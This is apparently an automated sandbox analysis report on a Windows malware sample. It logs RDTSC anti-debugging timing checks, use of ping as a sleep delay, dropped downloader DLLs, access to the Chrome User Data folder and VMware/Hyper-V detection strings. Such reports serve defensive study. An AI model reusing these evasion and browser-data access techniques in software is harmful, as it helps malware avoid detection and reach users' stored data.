Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403CBD second address: 0000000000403FB0 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b call ebx 0x0000000d push ebp 0x0000000e mov ebp, esp 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403FB6 second address: 0000000000403FD3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b push ecx 0x0000000c pushfd 0x0000000d pushad 0x0000000e xor ecx, ecx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000403FD9 second address: 0000000000403FFC instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404002 second address: 0000000000404029 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825643h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], 00000000h 0x00000012 pushfd 0x00000013 pushad 0x00000014 xor ecx, ecx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040402F second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825643h 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F47FC8256EAh 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040410F second address: 0000000000404137 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp-04h] 0x0000000e cmp ecx, dword ptr [ebp+0Ch] 0x00000011 jnc 00007F47FC82584Dh 0x00000017 pushfd 0x00000018 pushad 0x00000019 xor ecx, ecx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040413D second address: 0000000000404161 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825644h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404167 second address: 000000000040417F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825639h 0x00000009 popad 0x0000000a popfd 0x0000000b xor edx, edx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404185 second address: 00000000004041A9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825644h 0x00000009 popad 0x0000000a popfd 0x0000000b div dword ptr [ebp+14h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004041AF second address: 00000000004041D6 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825647h 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp+10h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004041DC second address: 00000000004041F9 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd 0x0000000b movsx ecx, byte ptr [eax+edx] 0x0000000f pushfd 0x00000010 pushad 0x00000011 xor ecx, ecx 0x00000013 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004041FF second address: 0000000000404223 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825644h 0x00000009 popad 0x0000000a popfd 0x0000000b mov edx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404229 second address: 0000000000404245 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd 0x0000000b add edx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040424B second address: 000000000040426A instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b movzx eax, byte ptr [edx] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404270 second address: 000000000040428F instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825640h 0x00000009 popad 0x0000000a popfd 0x0000000b sub eax, ecx 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404295 second address: 00000000004042B3 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Eh 0x00000009 popad 0x0000000a popfd 0x0000000b mov ecx, dword ptr [ebp+08h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004042B9 second address: 00000000004042D8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b add ecx, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004042DE second address: 0000000000404300 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825643h 0x00000009 popad 0x0000000a popfd 0x0000000b mov byte ptr [ecx], al 0x0000000d pushfd 0x0000000e pushad 0x0000000f xor ecx, ecx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 0000000000404306 second address: 0000000000404079 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Fh 0x00000009 popad 0x0000000a popfd 0x0000000b jmp 00007F47FC825387h 0x00000010 pushfd 0x00000011 pushad 0x00000012 xor ecx, ecx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 000000000040407F second address: 000000000040409B instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Ch 0x00000009 popad 0x0000000a popfd 0x0000000b mov eax, dword ptr [ebp-04h] 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040A1 second address: 00000000004040C1 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825640h 0x00000009 popad 0x0000000a popfd 0x0000000b add eax, 01h 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040C7 second address: 00000000004040E8 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC825641h 0x00000009 popad 0x0000000a popfd 0x0000000b mov dword ptr [ebp-04h], eax 0x0000000e pushfd 0x0000000f pushad 0x00000010 xor ecx, ecx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeRDTSC instruction interceptor: First address: 00000000004040EE second address: 0000000000404109 instructions: 0x00000000 rdtsc 0x00000002 sub ecx, eax 0x00000004 cmp ecx, 00000000h 0x00000007 jne 00007F47FC82563Eh 0x00000009 popad 0x0000000a popfd 0x0000000b pushfd 0x0000000c pushad 0x0000000d xor ecx, ecx 0x0000000f rdtsc
Uses ping.exe to sleepShow sources
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_00403E2C rdtsc 0_2_00403E2C
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019780 SetupDiGetDeviceRegistryPropertyA,GetLastError,_memset,SetupDiGetDeviceRegistryPropertyA,0_2_10019780
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\dl_peer_id.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\download_user.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcp71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\xldl.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exeJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\atl71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\msvcr71.dllJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\download\zlib1.dllJump to dropped file
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_100204C00_2_100204C0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_100204C02_2_100204C0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exe TID: 4652Thread sleep time: -90000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe TID: 6000Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe TID: 6548Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeFile opened: PhysicalDrive0Jump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1001A170 FindFirstFileA,FindClose,0_2_1001A170
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1001A170 FindFirstFileA,FindClose,2_2_1001A170
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Local\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeFile opened: C:\Users\user\AppData\Jump to behavior
Source: 56BB1610C0318054.exe, 00000002.00000003.388069693.0000000003D66000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}High precision event timerSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}WAN Miniport (IKEv2)NetSWDWAN Miniport (IKEv2){4d36e972-e325-11ce-bfc1-08002be10318}Composite Bus EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Virtual Drive EnumeratorSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Storage Spaces ControllerSCSIAdapterROOT{4d36e97b-e325-11ce-bfc1-08002be10318}System CMOS/real time clockSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Kernel Debug Network AdapterNetROOTMicrosoft Kernel Debug Network Adapter{4d36e972-e325-11ce-bfc1-08002be10318}Standard PS/2 KeyboardKeyboardACPI{4d36e96b-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}
Source: 56BB1610C0318054.exe, 00000002.00000003.369180667.0000000002261000.00000004.00000001.sdmpBinary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}
Source: 56BB1610C0318054.exe, 00000002.00000003.387589885.0000000003D78000.00000004.00000001.sdmpBinary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: ecvFEAD.tmp.9.drBinary or memory string: https://arc.msn.com/v3/Delivery/Placement?pubid=da63df93-3dbc-42ae-a505-b34988683ac7&pid=314559&adm=2&w=1&h=1&wpx=1&hpx=1&fmt=json&cltp=app&dim=le&rafb=0&nct=1&pm=1&cfmt=text,image,poly&sft=jpeg,png,gif&topt=1&poptin=0&localid=w:BE8AB8DF-DCD1-3523-4A95-3A04EAFF1CBA&ctry=US&time=20200930T152706Z&lc=en-US&pl=en-US&idtp=mid&uid=b029da70-c67b-4a7e-9bd5-517f7e302ed9&aid=00000000-0000-0000-0000-000000000000&ua=WindowsShellClient%2F9.0.40929.0%20%28Windows%29&asid=9464ba7a943c4f4990f3a39a7d804c7f&ctmode=MultiSession&arch=x64&cdm=1&cdmver=10.0.17134.1&devfam=Windows.Desktop&devform=Unknown&devosver=10.0.17134.1&disphorzres=1280&dispsize=17.1&dispvertres=1024&isu=0&lo=663574&metered=false&nettype=ethernet&npid=sc-314559&oemName=VMware%2C%20Inc.&oemid=VMware%2C%20Inc.&ossku=Professional&smBiosDm=VMware7%2C1&tl=2&tsu=663574&waasBldFlt=1&waasCfgExp=1&waasCfgSet=1&waasRetail=1&waasRing=
Source: 56BB1610C0318054.exe, 00000002.00000003.387787563.0000000003D61000.00000004.00000001.sdmpBinary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}`
Source: 56BB1610C0318054.exe, 00000002.00000003.390150062.0000000003DA5000.00000004.00000001.sdmpBinary or memory string: {4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}
Source: 56BB1610C0318054.exe, 00000002.00000003.390150062.0000000003DA5000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.378507554.00000000028A6000.00000004.00000001.sdmpBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Cyfj6XGbkd.exe, 00000000.00000002.365647493.000000000088D000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000002.00000002.413029538.00000000007E3000.00000004.00000020.sdmp, 56BB1610C0318054.exe, 00000004.00000003.371196297.00000000005A6000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: 56BB1610C0318054.exe, 00000004.00000003.368996807.0000000002A04000.00000004.00000040.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}#V
Source: 56BB1610C0318054.exe, 00000004.00000002.377144897.000000000019B000.00000004.00000010.sdmpBinary or memory string: VMware Virtual disk 2.0
Source: 56BB1610C0318054.exe, 00000002.00000002.413029538.00000000007E3000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAWocal Area Connection* 8-QoS Packet Scheduler-0000
Source: 56BB1610C0318054.exe, 00000004.00000002.377144897.000000000019B000.00000004.00000010.sdmpBinary or memory string: VMware
Source: 56BB1610C0318054.exe, 00000004.00000003.368954748.00000000028A1000.00000004.00000001.sdmpBinary or memory string: NetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP MonitorMonitorDISPLAY{4d36e96e-e325-11ce-bfc1-08002be10318}WAN Miniport (PPPOE)NetSWDWAN Miniport (PPPOE){4d36e972-e325-11ce-bfc1-08002be10318}PCI BusSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Hyper-V Generation CounterSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft Basic Display DriverSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}USB Input DeviceHIDClassUSB{745a17a0-74d3-11d0-b6fe-00a0c90f57da}VolumeVolumeSTORAGE{71a27cdd-812a-11d0-bec7-08002be2092f}USB Root Hub (USB 3.0)USBUSB{36fc9e60-c465-11cf-8056-444553540000}Generic software deviceSoftwareDeviceSWDMicrosoft RRAS Root Enumerator{62f9c741-b25a-46ce-b54c-9bccce08b6f2}WAN Miniport (PPTP)NetSWDWAN Miniport (PPTP){4d36e972-e325-11ce-bfc1-08002be10318}GU
Source: 56BB1610C0318054.exe, 00000002.00000003.369180667.0000000002261000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.378507554.00000000028A6000.00000004.00000001.sdmpBinary or memory string: Motherboard resourcesSystemACPI{4d36e97d-e325-11ce-bfc1-08002be10318}Microsoft AC AdapterBatteryACPI{72631e54-78a4-11d0-bcf7-00aa00b7b32a}Intel(R) 82574L Gigabit Network ConnectionNetPCIIntel(R) 82574L Gigabit Network Connection{4d36e972-e325-11ce-bfc1-08002be10318}LSI Adapter, SAS 3000 series, 8-port with 1068SCSIAdapterPCI{4d36e97b-e325-11ce-bfc1-08002be10318}PCI-to-PCI BridgeSystemPCI{4d36e97d-e325-11ce-bfc1-08002be10318}Local Print QueuePrintQueueSWDMicrosoft XPS Document Writer{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Local Print QueuePrintQueueSWDRoot Print Queue{1ed2bbf9-11f0-4084-b21f-ad83a8e6dcdc}Volume ManagerSystemROOT{4d36e97d-e325-11ce-bfc1-08002be10318}Generic Non-PnP 